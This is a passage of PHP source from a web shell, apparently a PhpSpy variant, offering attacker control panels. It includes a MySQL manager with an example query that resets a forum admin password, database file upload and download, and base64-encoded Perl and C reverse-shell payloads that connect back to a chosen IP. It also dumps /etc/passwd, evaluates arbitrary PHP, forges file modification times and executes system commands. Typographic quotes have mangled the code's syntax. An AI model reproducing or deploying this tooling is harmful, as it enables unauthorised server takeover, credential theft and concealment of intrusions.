$(‚mysqlfile‘).dbpass.value=$(‚dbinfo‘).dbpass.value;
$(‚mysqlfile‘).dbname.value=$(‚dbinfo‘).dbname.value;
$(‚mysqlfile‘).charset.value=$(‚dbinfo‘).charset.value;
$(‚mysqlfile‘).submit();
}
</script>
<?php
!$dbhost && $dbhost = ‚localhost‘;
!$dbuser && $dbuser = ‚root‘;
!$dbport && $dbport = ‚3306‘;
$charsets = array(“=>’Default‘,’gbk’=>’GBK‘, ‚big5’=>’Big5‘, ‚utf8’=>’UTF-8‘, ‚latin1’=>’Latin1‘);
formhead(array(‚title’=>’MYSQL Information‘,’name’=>’dbinfo‘));
makehide(‚action‘,’sqlfile‘);
p(‚<p>‘);
p(‚DBHost:‘);
makeinput(array(’name’=>’dbhost‘,’size’=>20,’value’=>$dbhost));
p(‚:‘);
makeinput(array(’name’=>’dbport‘,’size’=>4,’value’=>$dbport));
p(‚DBUser:‘);
makeinput(array(’name’=>’dbuser‘,’size’=>15,’value’=>$dbuser));
p(‚DBPass:‘);
makeinput(array(’name’=>’dbpass‘,’size’=>15,’value’=>$dbpass));
p(‚DBName:‘);
makeinput(array(’name’=>’dbname‘,’size’=>15,’value’=>$dbname));
p(‚DBCharset:‘);
makeselect(array(’name’=>’charset‘,’option’=>$charsets,’selected’=>$charset));
p(‚</p>‘);
formfoot();
p(‚<form action="‘.$self.’" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">‘);
p(‚<h2>Upload file</h2>‘);
p(‚<p><b>This operation the DB user must has FILE privilege</b></p>‘);
p(‚<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\’mysqlupload\‘);">Upload</a></p>‘);
p(‚<h2>Download file</h2>‘);
p(‚<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\’mysqldown\‘);">Download</a></p>‘);
makehide(‚dbhost‘);
makehide(‚dbport‘);
makehide(‚dbuser‘);
makehide(‚dbpass‘);
makehide(‚dbname‘);
makehide(‚charset‘);
makehide(‚doing‘);
makehide(‚action‘,’sqlfile‘);
p(‚</form>‘);
}
elseif ($action == ’sqladmin‘) {
!$dbhost && $dbhost = ‚localhost‘;
!$dbuser && $dbuser = ‚root‘;
!$dbport && $dbport = ‚3306‘;
$dbform = ‚<input type="hidden" id="connect" name="connect" value="1" />‘;
if(isset($dbhost)){
$dbform .= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
}
if(isset($dbuser)) {
$dbform .= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
}
if(isset($dbpass)) {
$dbform .= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
}
if(isset($dbport)) {
$dbform .= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
}
if(isset($dbname)) {
$dbform .= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
}
if(isset($charset)) {
$dbform .= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
}
if ($doing == ‚backupmysql‘ && $saveasfile) {
if (!$table) {
m(‚Please choose the table‘);
} else {
dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
$table = array_flip($table);
$fp = @fopen($path,’w‘);
if ($fp) {
$result = q(‚SHOW tables‘);
if (!$result) p(‚<h2>‘.mysql_error().'</h2>‘);
$mysqldata = “;
while ($currow = mysql_fetch_array($result)) {
if (isset($table[$currow[0]])) {
sqldumptable($currow[0], $fp);
}
}
fclose($fp);
$fileurl = str_replace(SA_ROOT,“,$path);
m(‚Database has success backup to <a href="‘.$fileurl.’" target="_blank">‘.$path.'</a>‘);
mysql_close();
} else {
m(‚Backup failed‘);
}
}
}
if ($insert && $insertsql) {
$keystr = $valstr = $tmp = “;
foreach($insertsql as $key => $val) {
if ($val) {
$keystr .= $tmp.$key;
$valstr .= $tmp."’".addslashes($val)."’";
$tmp = ‚,‘;
}
}
if ($keystr && $valstr) {
dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? ‚Insert new record of success‘ : mysql_error());
}
}
if ($update && $insertsql && $base64) {
$valstr = $tmp = “;
foreach($insertsql as $key => $val) {
$valstr .= $tmp.$key."=’".addslashes($val)."’";
$tmp = ‚,‘;
}
if ($valstr) {
$where = base64_decode($base64);
dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? ‚Record updating‘ : mysql_error());
}
}
if ($doing == ‚del‘ && $base64) {
$where = base64_decode($base64);
$delete_sql = "DELETE FROM $tablename WHERE $where";
dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
m(q("DELETE FROM $tablename WHERE $where") ? ‚Deletion record of success‘ : mysql_error());
}
if ($tablename && $doing == ‚drop‘) {
dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport);
if (q("DROP TABLE $tablename")) {
m(‚Drop table of success‘);
$tablename = “;
} else {
m(mysql_error());
}
}
$charsets = array(“=>’Default‘,’gbk’=>’GBK‘, ‚big5’=>’Big5‘, ‚utf8’=>’UTF-8‘, ‚latin1’=>’Latin1‘);
formhead(array(‚title’=>’MYSQL Manager‘));
makehide(‚action‘,’sqladmin‘);
p(‚<p>‘);
p(‚DBHost:‘);
makeinput(array(’name’=>’dbhost‘,’size’=>20,’value’=>$dbhost));
p(‚:‘);
makeinput(array(’name’=>’dbport‘,’size’=>4,’value’=>$dbport));
p(‚DBUser:‘);
makeinput(array(’name’=>’dbuser‘,’size’=>15,’value’=>$dbuser));
p(‚DBPass:‘);
makeinput(array(’name’=>’dbpass‘,’size’=>15,’value’=>$dbpass));
p(‚DBCharset:‘);
makeselect(array(’name’=>’charset‘,’option’=>$charsets,’selected’=>$charset));
makeinput(array(’name’=>’connect‘,’value’=>’Connect‘,’type’=>’submit‘,’class’=>’bt‘));
p(‚</p>‘);
formfoot();
?>
<script type="text/javascript">
function editrecord(action, base64, tablename){
if (action == ‚del‘) {
if (!confirm(‚Is or isn\’t deletion record?‘)) return;
}
$(‚recordlist‘).doing.value=action;
$(‚recordlist‘).base64.value=base64;
$(‚recordlist‘).tablename.value=tablename;
$(‚recordlist‘).submit();
}
function moddbname(dbname) {
if(!dbname) return;
$(’setdbname‘).dbname.value=dbname;
$(’setdbname‘).submit();
}
function settable(tablename,doing,page) {
if(!tablename) return;
if (doing) {
$(’settable‘).doing.value=doing;
}
if (page) {
$(’settable‘).page.value=page;
}
$(’settable‘).tablename.value=tablename;
$(’settable‘).submit();
}
</script>
<?php
// SQL
formhead(array(’name’=>’recordlist‘));
makehide(‚doing‘);
makehide(‚action‘,’sqladmin‘);
makehide(‚base64‘);
makehide(‚tablename‘);
p($dbform);
formfoot();
// Data
formhead(array(’name’=>’setdbname‘));
makehide(‚action‘,’sqladmin‘);
p($dbform);
if (!$dbname) {
makehide(‚dbname‘);
}
formfoot();
formhead(array(’name’=>’settable‘));
makehide(‚action‘,’sqladmin‘);
p($dbform);
makehide(‚tablename‘);
makehide(‚page‘,$page);
makehide(‚doing‘);
formfoot();
$cachetables = array();
$pagenum = 30;
$page = intval($page);
if($page) {
$start_limit = ($page – 1) * $pagenum;
} else {
$start_limit = 0;
$page = 1;
}
if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
// get mysql server
$mysqlver = mysql_get_server_info();
p(‚<p>MySQL ‚.$mysqlver.‘ running in ‚.$dbhost.‘ as ‚.$dbuser.’@‘.$dbhost.'</p>‘);
$highver = $mysqlver > ‚4.1‘ ? 1 : 0;
// Show database
$query = q("SHOW DATABASES");
$dbs = array();
$dbs[] = ‚– Select a database –‚;
while($db = mysql_fetch_array($query)) {
$dbs[$db[‚Database‘]] = $db[‚Database‘];
}
makeselect(array(‚title’=>’Please select a database:‘,’name’=>’db[]‘,’option’=>$dbs,’selected’=>$dbname,’onchange’=>’moddbname(this.options[this.selectedIndex].value)‘,’newline’=>1));
$tabledb = array();
if ($dbname) {
p(‚<p>‘);
p(‚Current dababase: <a href="javascript:moddbname(\“.$dbname.’\‘);">‘.$dbname.'</a>‘);
if ($tablename) {
p(‚ | Current Table: <a href="javascript:settable(\“.$tablename.’\‘);">‘.$tablename.'</a> [ <a href="javascript:settable(\“.$tablename.’\‘, \’insert\‘);">Insert</a> | <a href="javascript:settable(\“.$tablename.’\‘, \’structure\‘);">Structure</a> | <a href="javascript:settable(\“.$tablename.’\‘, \’drop\‘);">Drop</a> ]‘);
}
p(‚</p>‘);
mysql_select_db($dbname);
$getnumsql = “;
$runquery = 0;
if ($sql_query) {
$runquery = 1;
}
$allowedit = 0;
if ($tablename && !$sql_query) {
$sql_query = "SELECT * FROM $tablename";
$getnumsql = $sql_query;
$sql_query = $sql_query." LIMIT $start_limit, $pagenum";
$allowedit = 1;
}
p(‚<form action="‘.$self.’" method="POST">‘);
p(‚<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database <font color=red><b>‘.$dbname.'</font></b>:<BR>Example VBB Password: <font color=red>vbateam</font><BR><font color=yellow>UPDATE `user` SET `password` = \’69e53e5ab9536e55d31ff533aefc4fbe\‘, salt = \’p5T\‘ WHERE `userid` = \’1\‘ </font>
</td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">‘.htmlspecialchars($sql_query,ENT_QUOTES).'</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>‘);
makehide(‚tablename‘, $tablename);
makehide(‚action‘,’sqladmin‘);
p($dbform);
p(‚</form>‘);
if ($tablename || ($runquery && $sql_query)) {
if ($doing == ’structure‘) {
$result = q("SHOW COLUMNS FROM $tablename");
$rowdb = array();
while($row = mysql_fetch_array($result)) {
$rowdb[] = $row;
}
p(‚<table border="0" cellpadding="3" cellspacing="0">‘);
p(‚<tr class="head">‘);
p(‚<td>Field</td>‘);
p(‚<td>Type</td>‘);
p(‚<td>Null</td>‘);
p(‚<td>Key</td>‘);
p(‚<td>Default</td>‘);
p(‚<td>Extra</td>‘);
p(‚</tr>‘);
foreach ($rowdb as $row) {
$thisbg = bg();
p(‚<tr class="fout" onmouseover="this.className=\’focus\‘;" onmouseout="this.className=\’fout\‘;">‘);
p(‚<td>‘.$row[‚Field‘].'</td>‘);
p(‚<td>‘.$row[‚Type‘].'</td>‘);
p(‚<td>‘.$row[‚Null‘].’ </td>‘);
p(‚<td>‘.$row[‚Key‘].’ </td>‘);
p(‚<td>‘.$row[‚Default‘].’ </td>‘);
p(‚<td>‘.$row[‚Extra‘].’ </td>‘);
p(‚</tr>‘);
}
tbfoot();
} elseif ($doing == ‚insert‘ || $doing == ‚edit‘) {
$result = q(‚SHOW COLUMNS FROM ‚.$tablename);
while ($row = mysql_fetch_array($result)) {
$rowdb[] = $row;
}
$rs = array();
if ($doing == ‚insert‘) {
p(‚<h2>Insert new line in ‚.$tablename.‘ table »</h2>‘);
} else {
p(‚<h2>Update record in ‚.$tablename.‘ table »</h2>‘);
$where = base64_decode($base64);
$result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
$rs = mysql_fetch_array($result);
}
p(‚<form method="post" action="‘.$self.’">‘);
p($dbform);
makehide(‚action‘,’sqladmin‘);
makehide(‚tablename‘,$tablename);
p(‚<table border="0" cellpadding="3" cellspacing="0">‘);
foreach ($rowdb as $row) {
if ($rs[$row[‚Field‘]]) {
$value = htmlspecialchars($rs[$row[‚Field‘]]);
} else {
$value = “;
}
$thisbg = bg();
p(‚<tr class="fout" onmouseover="this.className=\’focus\‘;" onmouseout="this.className=\’fout\‘;">‘);
p(‚<td><b>‘.$row[‚Field‘].'</b><br />‘.$row[‚Type‘].'</td><td><textarea class="area" name="insertsql[‚.$row[‚Field‘].‘]" style="width:500px;height:60px;overflow:auto;">‘.$value.'</textarea></td></tr>‘);
}
if ($doing == ‚insert‘) {
p(‚<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>‘);
} else {
p(‚<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>‘);
makehide(‚base64‘, $base64);
}
p(‚</table></form>‘);
} else {
$querys = @explode(‚;‘,$sql_query);
foreach($querys as $num=>$query) {
if ($query) {
p("<p><b>Query#{$num} : ".htmlspecialchars($query,ENT_QUOTES)."</b></p>");
switch(qy($query))
{
case 0:
p(‚<h2>Error : ‚.mysql_error().'</h2>‘);
break;
case 1:
if (strtolower(substr($query,0,13)) == ’select * from‘) {
$allowedit = 1;
}
if ($getnumsql) {
$tatol = mysql_num_rows(q($getnumsql));
$multipage = multi($tatol, $pagenum, $page, $tablename);
}
if (!$tablename) {
$sql_line = str_replace(array("\r", "\n", "\t"), array(‚ ‚, ‚ ‚, ‚ ‚), trim(htmlspecialchars($query)));
$sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i",$sql_line,$matches);
$tablename = $matches[1][0];
}
$result = q($query);
p($multipage);
p(‚<table border="0" cellpadding="3" cellspacing="0">‘);
p(‚<tr class="head">‘);
if ($allowedit) p(‚<td>Action</td>‘);
$fieldnum = @mysql_num_fields($result);
for($i=0;$i<$fieldnum;$i++){
$name = @mysql_field_name($result, $i);
$type = @mysql_field_type($result, $i);
$len = @mysql_field_len($result, $i);
p("<td nowrap>$name<br><span>$type($len)</span></td>");
}
p(‚</tr>‘);
while($mn = @mysql_fetch_assoc($result)){
$thisbg = bg();
p(‚<tr class="fout" onmouseover="this.className=\’focus\‘;" onmouseout="this.className=\’fout\‘;">‘);
$where = $tmp = $b1 = “;
foreach($mn as $key=>$inside){
if ($inside) {
$where .= $tmp.$key."=’".addslashes($inside)."’";
$tmp = ‚ AND ‚;
}
$b1 .= ‚<td nowrap>‘.html_clean($inside).’ </td>‘;
}
$where = base64_encode($where);
if ($allowedit) p(‚<td nowrap><a href="javascript:editrecord(\’edit\‘, \“.$where.’\‘, \“.$tablename.’\‘);">Edit</a> | <a href="javascript:editrecord(\’del\‘, \“.$where.’\‘, \“.$tablename.’\‘);">Del</a></td>‘);
p($b1);
p(‚</tr>‘);
unset($b1);
}
tbfoot();
p($multipage);
break;
case 2:
$ar = mysql_affected_rows();
p(‚<h2>affected rows : <b>‘.$ar.'</b></h2>‘);
break;
}
}
}
}
} else {
$query = q("SHOW TABLE STATUS");
$table_num = $table_rows = $data_size = 0;
$tabledb = array();
while($table = mysql_fetch_array($query)) {
$data_size = $data_size + $table[‚Data_length‘];
$table_rows = $table_rows + $table[‚Rows‘];
$table[‚Data_length‘] = sizecount($table[‚Data_length‘]);
$table_num++;
$tabledb[] = $table;
}
$data_size = sizecount($data_size);
unset($table);
p(‚<table border="0" cellpadding="0" cellspacing="0">‘);
p(‚<form action="‘.$self.’" method="POST">‘);
makehide(‚action‘,’sqladmin‘);
p($dbform);
p(‚<tr class="head">‘);
p(‚<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>‘);
p(‚<td>Name</td>‘);
p(‚<td>Rows</td>‘);
p(‚<td>Data_length</td>‘);
p(‚<td>Create_time</td>‘);
p(‚<td>Update_time</td>‘);
if ($highver) {
p(‚<td>Engine</td>‘);
p(‚<td>Collation</td>‘);
}
p(‚</tr>‘);
foreach ($tabledb as $key => $table) {
$thisbg = bg();
p(‚<tr class="fout" onmouseover="this.className=\’focus\‘;" onmouseout="this.className=\’fout\‘;">‘);
p(‚<td align="center" width="2%"><input type="checkbox" name="table[]" value="‘.$table[‚Name‘].’" /></td>‘);
p(‚<td><a href="javascript:settable(\“.$table[‚Name‘].’\‘);">‘.$table[‚Name‘].'</a> [ <a href="javascript:settable(\“.$table[‚Name‘].’\‘, \’insert\‘);">Insert</a> | <a href="javascript:settable(\“.$table[‚Name‘].’\‘, \’structure\‘);">Structure</a> | <a href="javascript:settable(\“.$table[‚Name‘].’\‘, \’drop\‘);">Drop</a> ]</td>‘);
p(‚<td>‘.$table[‚Rows‘].'</td>‘);
p(‚<td>‘.$table[‚Data_length‘].'</td>‘);
p(‚<td>‘.$table[‚Create_time‘].'</td>‘);
p(‚<td>‘.$table[‚Update_time‘].'</td>‘);
if ($highver) {
p(‚<td>‘.$table[‚Engine‘].'</td>‘);
p(‚<td>‘.$table[‚Collation‘].'</td>‘);
}
p(‚</tr>‘);
}
p(‚<tr class=fout>‘);
p(‚<td> </td>‘);
p(‚<td>Total tables: ‚.$table_num.'</td>‘);
p(‚<td>‘.$table_rows.'</td>‘);
p(‚<td>‘.$data_size.'</td>‘);
p(‚<td colspan="‘.($highver ? 4 : 2).’"> </td>‘);
p(‚</tr>‘);
p("<tr class=\"fout\"><td colspan=\"".($highver ? 8 : 6)."\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"".SA_ROOT.$_SERVER[‚HTTP_HOST‘]."_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
makehide(‚doing‘,’backupmysql‘);
formfoot();
p("</table>");
fr($query);
}
}
}
tbfoot();
@mysql_close();
}//end sql backup
elseif ($action == ‚backconnect‘) {
!$yourip && $yourip = $_SERVER[‚REMOTE_ADDR‘];
!$yourport && $yourport = ‚12345‘;
$usedb = array(‚perl’=>’perl‘,’c’=>’c‘);
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC".
"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb".
"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd".
"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ".
"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC".
"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D".
"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp".
"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
if ($start && $yourip && $yourport && $use){
if ($use == ‚perl‘) {
cf(‚/tmp/angel_bc‘,$back_connect);
$res = execute(which(‚perl‘)." /tmp/angel_bc $yourip $yourport &");
} else {
cf(‚/tmp/angel_bc.c‘,$back_connect_c);
$res = execute(‚gcc -o /tmp/angel_bc /tmp/angel_bc.c‘);
@unlink(‚/tmp/angel_bc.c‘);
$res = execute("/tmp/angel_bc $yourip $yourport &");
}
m("Now script try connect to $yourip port $yourport …");
}
formhead(array(‚title’=>’Back Connect‘));
makehide(‚action‘,’backconnect‘);
p(‚<p>‘);
p(‚Your IP:‘);
makeinput(array(’name’=>’yourip‘,’size’=>20,’value’=>$yourip));
p(‚Your Port:‘);
makeinput(array(’name’=>’yourport‘,’size’=>15,’value’=>$yourport));
p(‚Use:‘);
makeselect(array(’name’=>’use‘,’option’=>$usedb,’selected’=>$use));
makeinput(array(’name’=>’start‘,’value’=>’Start‘,’type’=>’submit‘,’class’=>’bt‘));
p(‚</p>‘);
formfoot();
}//end backconnect window via NC
elseif ($action == ‚etcpwd‘) {
formhead(array(‚title’=>’Get /etc/passwd‘));
makehide(‚action‘,’etcpwd‘);
makehide(‚dir‘,$nowpath);
$i = 0;
echo "<p><br><textarea class=\"area\" id=\"phpcodexxx\" name=\"phpcodexxx\" cols=\"100\" rows=\"25\">";
while ($i < 60000) {
$line = posix_getpwuid($i);
if (!empty($line)) {
while (list ($key, $vba_etcpwd) = each($line)){
echo "".$vba_etcpwd."\n";
break;
}
}
$i++;
}
echo "</textarea></p>";
formfoot();
}
elseif ($action == ‚eval‘) {
$phpcode = trim($phpcode);
if($phpcode){
if (!preg_match(‚#<\?#si‘, $phpcode)) {
$phpcode = "<?php\n\n{$phpcode}\n\n?>";
}
eval("?".">$phpcode<?");
}
formhead(array(‚title’=>’Eval PHP Code‘));
makehide(‚action‘,’eval‘);
maketext(array(‚title’=>’PHP Code‘,’name’=>’phpcode‘, ‚value’=>$phpcode));
p(‚<p><a href="http://www.4ngel.net/phpspy/plugin/" target="_blank">Get plugins</a></p>‘);
formfooter();
}//end eval
elseif ($action == ‚editfile‘) {
if(file_exists($opfile)) {
$fp=@fopen($opfile,’r‘);
$contents=@fread($fp, filesize($opfile));
@fclose($fp);
$contents=htmlspecialchars($contents);
}
formhead(array(‚title’=>’Create / Edit File‘));
makehide(‚action‘,’file‘);
makehide(‚dir‘,$nowpath);
makeinput(array(‚title’=>’Current File (import new file name and new file)‘,’name’=>’editfilename‘,’value’=>$opfile,’newline’=>1));
maketext(array(‚title’=>’File Content‘,’name’=>’filecontent‘,’value’=>$contents));
formfooter();
}//end editfile
elseif ($action == ’newtime‘) {
$opfilemtime = @filemtime($opfile);
//$time = strtotime("$year-$month-$day $hour:$minute:$second");
$cachemonth = array(‚January’=>1,’February’=>2,’March’=>3,’April’=>4,’May’=>5,’June’=>6,’July’=>7,’August’=>8,’September’=>9,’October’=>10,’November’=>11,’December’=>12);
formhead(array(‚title’=>’Clone file was last modified time‘));
makehide(‚action‘,’file‘);
makehide(‚dir‘,$nowpath);
makeinput(array(‚title’=>’Alter file‘,’name’=>’curfile‘,’value’=>$opfile,’size’=>120,’newline’=>1));
makeinput(array(‚title’=>’Reference file (fullpath)‘,’name’=>’tarfile‘,’size’=>120,’newline’=>1));
formfooter();
formhead(array(‚title’=>’Set last modified‘));
makehide(‚action‘,’file‘);
makehide(‚dir‘,$nowpath);
makeinput(array(‚title’=>’Current file (fullpath)‘,’name’=>’curfile‘,’value’=>$opfile,’size’=>120,’newline’=>1));
p(‚<p>Instead »‘);
p(‚year:‘);
makeinput(array(’name’=>’year‘,’value’=>date(‚Y‘,$opfilemtime),’size’=>4));
p(‚month:‘);
makeinput(array(’name’=>’month‘,’value’=>date(‚m‘,$opfilemtime),’size’=>2));
p(‚day:‘);
makeinput(array(’name’=>’day‘,’value’=>date(‚d‘,$opfilemtime),’size’=>2));
p(‚hour:‘);
makeinput(array(’name’=>’hour‘,’value’=>date(‚H‘,$opfilemtime),’size’=>2));
p(‚minute:‘);
makeinput(array(’name’=>’minute‘,’value’=>date(‚i‘,$opfilemtime),’size’=>2));
p(’second:‘);
makeinput(array(’name’=>’second‘,’value’=>date(’s‘,$opfilemtime),’size’=>2));
p(‚</p>‘);
formfooter();
}//end newtime
elseif ($action == ’shell‘) {
if (IS_WIN && IS_COM) {
if($program && $parameter) {
$shell= new COM(‚Shell.Application‘);
$a = $shell->ShellExecute($program,$parameter);
m(‚Program run has ‚.(!$a ? ’success‘ : ‚fail‘));
}
!$program && $program = ‚c:\windows\system32\cmd.exe‘;
!$parameter && $parameter = ‚/c net start > ‚.SA_ROOT.’log.txt‘;
formhead(array(‚title’=>’Execute Program‘));
makehide(‚action‘,’shell‘);
makeinput(array(‚title’=>’Program‘,’name’=>’program‘,’value’=>$program,’newline’=>1));
p(‚<p>‘);
makeinput(array(‚title’=>’Parameter‘,’name’=>’parameter‘,’value’=>$parameter));
makeinput(array(’name’=>’submit‘,’class’=>’bt‘,’type’=>’submit‘,’value’=>’Execute‘));
p(‚</p>‘);
formfoot();
}
formhead(array(‚title’=>’Execute Command‘));
makehide(‚action‘,’shell‘);
if (IS_WIN && IS_COM) {
$execfuncdb = array(‚phpfunc’=>’phpfunc‘,’wscript’=>’wscript‘,’proc_open’=>’proc_open‘);
makeselect(array(‚title’=>’Use:‘,’name’=>’execfunc‘,’option’=>$execfuncdb,’selected’=>$execfunc,’newline’=>1));
}
p(‚<p>‘);
makeinput(array(‚title’=>’Command‘,’name’=>’command‘,’value’=>$command));
makeinput(array(’name’=>’submit‘,’class’=>’bt‘,’type’=>’submit‘,’value’=>’Execute‘));
p(‚</p>‘);
formfoot();
if ($command) {
p(‚<hr width="100%" noshade /><pre>‘);
if ($execfunc==’wscript‘ && IS_WIN && IS_COM) {
$wsh = new COM(‚WScript.shell‘);
$exec = $wsh->exec(‚cmd.exe /c ‚.$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
} elseif ($execfunc==’proc_open‘ && IS_WIN && IS_COM) {
$descriptorspec = array(
0 => array(‚pipe‘, ‚r‘),
1 => array(‚pipe‘, ‚w‘),
2 => array(‚pipe‘, ‚w‘)
);
$process = proc_open($_SERVER[‚COMSPEC‘], $descriptorspec, $pipes);
if (is_resource($process)) {
fwrite($pipes[0], $command."\r\n");
fwrite($pipes[0], "exit\r\n");
fclose($pipes[0]);
while (!feof($pipes[1])) {
echo fgets($pipes[1], 1024);
}
fclose($pipes[1]);
while (!feof($pipes[2])) {
echo fgets($pipes[2], 1024);
}
fclose($pipes[2]);
proc_close($process);
}
} else {
echo(execute($command));
}
p(‚</pre>‘);
}
}//end shell
elseif ($action == ‚phpenv‘) {
$upsize=getcfg(‚file_uploads‘) ? getcfg(‚upload_max_filesize‘) : ‚Not allowed‘;
$adminmail=isset($_SERVER[‚SERVER_ADMIN‘]) ? $_SERVER[‚SERVER_ADMIN‘] : getcfg(’sendmail_from‘);
!$dis_func && $dis_func = ‚No‘;
$info = array(
1 => array(‚Server Time‘,date(‚Y/m/d h:i:s‘,$timestamp)),
2 => array(‚Server Domain‘,$_SERVER[‚SERVER_NAME‘]),
3 => array(‚Server IP‘,gethostbyname($_SERVER[‚SERVER_NAME‘])),
4 => array(‚Server OS‘,PHP_OS),
5 => array(‚Server OS Charset‘,$_SERVER[‚HTTP_ACCEPT_LANGUAGE‘]),
6 => array(‚Server Software‘,$_SERVER[‚SERVER_SOFTWARE‘]),
7 => array(‚Server Web Port‘,$_SERVER[‚SERVER_PORT‘]),
8 => array(‚PHP run mode‘,strtoupper(php_sapi_name())),
9 => array(‚The file path‘,__FILE__),
10 => array(‚PHP Version‘,PHP_VERSION),
11 => array(‚PHPINFO‘,(IS_PHPINFO ? ‚<a href="javascript:goaction(\’phpinfo\‘);">Yes</a>‘ : ‚No‘)),
12 => array(‚Safe Mode‘,getcfg(’safe_mode‘)),
13 => array(‚Administrator‘,$adminmail),
14 => array(‚allow_url_fopen‘,getcfg(‚allow_url_fopen‘)),
15 => array(‚enable_dl‘,getcfg(‚enable_dl‘)),
16 => array(‚display_errors‘,getcfg(‚display_errors‘)),
17 => array(‚register_globals‘,getcfg(‚register_globals‘)),
18 => array(‚magic_quotes_gpc‘,getcfg(‚magic_quotes_gpc‘)),
19 => array(‚memory_limit‘,getcfg(‚memory_limit‘)),
20 => array(‚post_max_size‘,getcfg(‚post_max_size‘)),
21 => array(‚upload_max_filesize‘,$upsize),
22 => array(‚max_execution_time‘,getcfg(‚max_execution_time‘).‘ second(s)‘),
23 => array(‚disable_functions‘,$dis_func),
);
if($phpvarname) {
m($phpvarname .‘ : ‚.getcfg($phpvarname));
}
formhead(array(‚title’=>’Server environment‘));
